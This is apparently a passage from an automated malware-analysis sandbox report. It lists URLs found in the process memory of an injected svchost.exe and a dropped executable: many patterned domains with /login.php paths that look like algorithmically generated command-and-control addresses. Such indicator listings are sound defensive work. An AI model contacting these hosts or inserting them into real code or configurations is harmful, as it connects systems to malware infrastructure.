Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatykyh.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypas.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypub.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqeb.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqih.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689012083.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrah.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/http://puvytag.com/http://puvytag.com/http://gatyviw.com/http://gatyviw.com/
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyvyz.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyged.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664428957.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913386087.0000000003383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661481983.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjan.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lygymoj.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynox.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084574856.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysid.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600938466.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytix.com/login.php
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvar.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxux.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/http://lykyfen.com/H
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
Source: svchost.exe, 00000002.00000003.1644432968.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfud.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
